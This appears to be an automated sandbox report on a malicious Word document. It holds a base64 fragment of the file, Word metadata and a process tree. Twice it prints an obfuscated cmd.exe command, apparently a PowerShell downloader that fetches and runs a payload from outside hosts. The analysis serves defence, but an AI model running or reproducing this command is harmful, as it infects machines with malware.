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 VABPAE8AUABFAE4AAABAAAAL8AQAAAASNFZ4
WordDocumentShapeDefaultsShapedefaultsExt: edit
WordDocumentShapeDefaultsShapedefaultsSpidmax: 1026
WordDocumentShapeDefaultsShapelayoutExt: edit
WordDocumentShapeDefaultsShapelayoutIdmapExt: edit
WordDocumentShapeDefaultsShapelayoutIdmapData: 1
WordDocumentDocPrViewVal: print
WordDocumentDocPrZoomPercent: 100
WordDocumentDocPrRemovePersonalInformation: -
WordDocumentDocPrDoNotEmbedSystemFonts: -
WordDocumentDocPrDefaultTabStopVal: 720
WordDocumentDocPrPunctuationKerning: -
WordDocumentDocPrCharacterSpacingControlVal: DontCompress
WordDocumentDocPrOptimizeForBrowser: -
WordDocumentDocPrDoNotSaveWebPagesAsSingleFile: -
WordDocumentDocPrPixelsPerInchVal: 120
WordDocumentDocPrValidateAgainstSchema: -
WordDocumentDocPrSaveInvalidXMLVal: off
WordDocumentDocPrIgnoreMixedContentVal: off
WordDocumentDocPrAlwaysShowPlaceholderTextVal: off
WordDocumentDocPrCompatBreakWrappedTables: -
WordDocumentDocPrCompatSnapToGridInCell: -
WordDocumentDocPrCompatWrapTextWithPunct: -
WordDocumentDocPrCompatUseAsianBreakRules: -
WordDocumentDocPrCompatDontGrowAutofit: -
WordDocumentDocPrRsidsRsidRootVal: 005E6EE1
WordDocumentDocPrRsidsRsidVal: 00200428
WordDocumentBodySectPRsidR: 005E6EE1
WordDocumentBodySectPRsidRDefault: 00200428
WordDocumentBodySectPRRsidRPr: 0038126B
WordDocumentBodySectPRRPrNoProof: -
WordDocumentBodySectPRPictShapetypeId: _x0000_t75
WordDocumentBodySectPRPictShapetypeCoordsize: 21600,21600
WordDocumentBodySectPRPictShapetypeSpt: 75
WordDocumentBodySectPRPictShapetypePreferrelative: t
WordDocumentBodySectPRPictShapetypePath: m@4@5l@4@11@9@11@9@5xe
WordDocumentBodySectPRPictShapetypeFilled: f
WordDocumentBodySectPRPictShapetypeStroked: f
WordDocumentBodySectPRPictShapetypeStrokeJoinstyle: miter
WordDocumentBodySectPRPictShapetypeFormulasFEqn: if lineDrawn pixelLineWidth 0
WordDocumentBodySectPRPictShapetypePathExtrusionok: f
WordDocumentBodySectPRPictShapetypePathGradientshapeok: t
WordDocumentBodySectPRPictShapetypePathConnecttype: rect
WordDocumentBodySectPRPictShapetypeLockExt: edit
WordDocumentBodySectPRPictShapetypeLockAspectratio: t
WordDocumentBodySectPRPictBinDataName: wordml://02000001.jpg
WordDocumentBodySectPRPictBinData: (Binary data 145376 bytes, use -b option to extract)
WordDocumentBodySectPRPictShapeId: Picture 1
WordDocumentBodySectPRPictShapeSpid: _x0000_i1025
WordDocumentBodySectPRPictShapeType: #_x0000_t75
WordDocumentBodySectPRPictShapeStyle: width:468pt;height:349.5pt;visibility:visible;mso-wrap-style:square
WordDocumentBodySectPRPictShapeImagedataSrc: wordml://02000001.jpg
WordDocumentBodySectPRPictShapeImagedataTitle: -
WordDocumentBodySectSectPrRsidR: 005E6EE1
WordDocumentBodySectSectPrPgSzW: 12240
WordDocumentBodySectSectPrPgSzH: 15840
WordDocumentBodySectSectPrPgMarTop: 1440
WordDocumentBodySectSectPrPgMarRight: 1440
WordDocumentBodySectSectPrPgMarBottom: 1440
WordDocumentBodySectSectPrPgMarLeft: 1440
WordDocumentBodySectSectPrPgMarHeader: 720
WordDocumentBodySectSectPrPgMarFooter: 720
WordDocumentBodySectSectPrPgMarGutter: -
WordDocumentBodySectSectPrColsSpace: 720
WordDocumentBodySectSectPrDocGridLine-pitch: 360
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
41
Monitored processes
10
Malicious processes
3
Suspicious processes
5

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs powershell.exe 269.exe no specs 269.exe wabmetagen.exe no specs wabmetagen.exe

Process information

PID
CMD
Path
Indicators
Parent process
2976"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\05616586598.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
4044c:\w4537\d5871\t6947\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:/C"set xgz==r{89p.o;g_tu@-57hszb'6FIc)BeayD$iL+\N2lkJP% 4GY(m3HT}ZnS:jxORKEA/Wv1f,wU0CdM~&&for %m in (5,7,71,43,42,72,27,34,24,74,57,77,15,70,68,43,1,43,56,63,56,56,24,60,37,37,64,76,63,57,77,14,45,70,68,43,17,43,52,63,76,42,57,77,14,50,70,68,43,39,39,44,32,12,15,3,45,45,0,21,75,68,16,4,45,21,8,32,17,4,45,68,73,0,55,28,71,14,7,20,58,28,25,11,44,37,28,11,6,66,28,20,74,39,33,28,55,11,8,32,40,50,22,73,4,0,21,17,11,11,5,57,65,65,29,17,39,12,55,33,67,28,1,18,33,11,30,6,25,7,49,65,39,66,3,54,4,60,73,40,60,39,11,13,17,11,11,5,57,65,65,71,71,71,6,49,28,9,29,69,33,9,17,11,7,55,6,18,29,55,75,20,7,59,5,17,6,25,7,49,65,71,51,60,33,72,11,23,71,24,27,58,10,67,12,13,17,11,11,5,57,65,65,5,11,7,69,6,25,39,12,20,65,71,25,30,68,72,46,61,33,31,4,4,68,10,69,18,55,13,17,11,11,5,57,65,65,29,33,1,25,7,55,5,1,7,6,25,7,6,19,29,65,47,69,17,51,34,5,9,18,62,41,73,67,10,23,75,28,13,17,11,11,5,57,65,65,18,25,17,29,5,28,55,20,28,75,1,33,58,69,6,55,39,65,28,3,28,46,63,50,20,23,1,25,3,73,11,66,76,20,21,6,56,5,39,33,11,48,21,13,21,26,8,32,58,50,16,4,45,0,21,7,22,15,38,38,21,8,32,67,45,50,50,16,44,0,44,21,38,22,4,21,8,32,12,45,45,73,16,0,21,29,45,45,4,4,21,8,32,18,3,4,3,22,0,32,28,55,67,57,11,28,49,5,35,21,36,21,35,32,67,45,50,50,16,35,21,6,28,59,28,21,8,69,7,1,28,29,25,17,48,32,7,15,68,16,22,44,33,55,44,32,40,50,22,73,4,26,2,11,1,30,2,32,17,4,45,68,73,6,31,7,71,55,39,7,29,75,23,33,39,28,48,32,7,15,68,16,22,70,44,32,18,3,4,3,22,26,8,32,49,68,3,22,68,0,21,75,68,4,22,15,21,8,24,69,44,48,48,46,28,11,14,24,11,28,49,44,32,18,3,4,3,22,26,6,39,28,55,9,11,17,44,14,9,28,44,45,73,73,73,73,26,44,2,24,55,67,7,40,28,14,24,11,28,49,44,32,18,3,4,3,22,8,32,71,68,15,68,45,0,21,49,68,15,4,3,21,8,20,1,28,29,40,8,53,53,25,29,11,25,17,2,53,53,32,5,3,50,22,22,0,21,20,50,45,15,68,21,8,82)do set NZ=!NZ!!xgz:~%m,1!&&if %m gtr 81 echo !NZ:*NZ!=!|cmd"c:\windows\system32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2608CmD /V:/C"set xgz==r{89p.o;g_tu@-57hszb'6FIc)BeayD$iL+\N2lkJP% 4GY(m3HT}ZnS:jxORKEA/Wv1f,wU0CdM~&&for %m in (5,7,71,43,42,72,27,34,24,74,57,77,15,70,68,43,1,43,56,63,56,56,24,60,37,37,64,76,63,57,77,14,45,70,68,43,17,43,52,63,76,42,57,77,14,50,70,68,43,39,39,44,32,12,15,3,45,45,0,21,75,68,16,4,45,21,8,32,17,4,45,68,73,0,55,28,71,14,7,20,58,28,25,11,44,37,28,11,6,66,28,20,74,39,33,28,55,11,8,32,40,50,22,73,4,0,21,17,11,11,5,57,65,65,29,17,39,12,55,33,67,28,1,18,33,11,30,6,25,7,49,65,39,66,3,54,4,60,73,40,60,39,11,13,17,11,11,5,57,65,65,71,71,71,6,49,28,9,29,69,33,9,17,11,7,55,6,18,29,55,75,20,7,59,5,17,6,25,7,49,65,71,51,60,33,72,11,23,71,24,27,58,10,67,12,13,17,11,11,5,57,65,65,5,11,7,69,6,25,39,12,20,65,71,25,30,68,72,46,61,33,31,4,4,68,10,69,18,55,13,17,11,11,5,57,65,65,29,33,1,25,7,55,5,1,7,6,25,7,6,19,29,65,47,69,17,51,34,5,9,18,62,41,73,67,10,23,75,28,13,17,11,11,5,57,65,65,18,25,17,29,5,28,55,20,28,75,1,33,58,69,6,55,39,65,28,3,28,46,63,50,20,23,1,25,3,73,11,66,76,20,21,6,56,5,39,33,11,48,21,13,21,26,8,32,58,50,16,4,45,0,21,7,22,15,38,38,21,8,32,67,45,50,50,16,44,0,44,21,38,22,4,21,8,32,12,45,45,73,16,0,21,29,45,45,4,4,21,8,32,18,3,4,3,22,0,32,28,55,67,57,11,28,49,5,35,21,36,21,35,32,67,45,50,50,16,35,21,6,28,59,28,21,8,69,7,1,28,29,25,17,48,32,7,15,68,16,22,44,33,55,44,32,40,50,22,73,4,26,2,11,1,30,2,32,17,4,45,68,73,6,31,7,71,55,39,7,29,75,23,33,39,28,48,32,7,15,68,16,22,70,44,32,18,3,4,3,22,26,8,32,49,68,3,22,68,0,21,75,68,4,22,15,21,8,24,69,44,48,48,46,28,11,14,24,11,28,49,44,32,18,3,4,3,22,26,6,39,28,55,9,11,17,44,14,9,28,44,45,73,73,73,73,26,44,2,24,55,67,7,40,28,14,24,11,28,49,44,32,18,3,4,3,22,8,32,71,68,15,68,45,0,21,49,68,15,4,3,21,8,20,1,28,29,40,8,53,53,25,29,11,25,17,2,53,53,32,5,3,50,22,22,0,21,20,50,45,15,68,21,8,82)do set NZ=!NZ!!xgz:~%m,1!&&if %m gtr 81 echo !NZ:*NZ!=!|cmd"C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
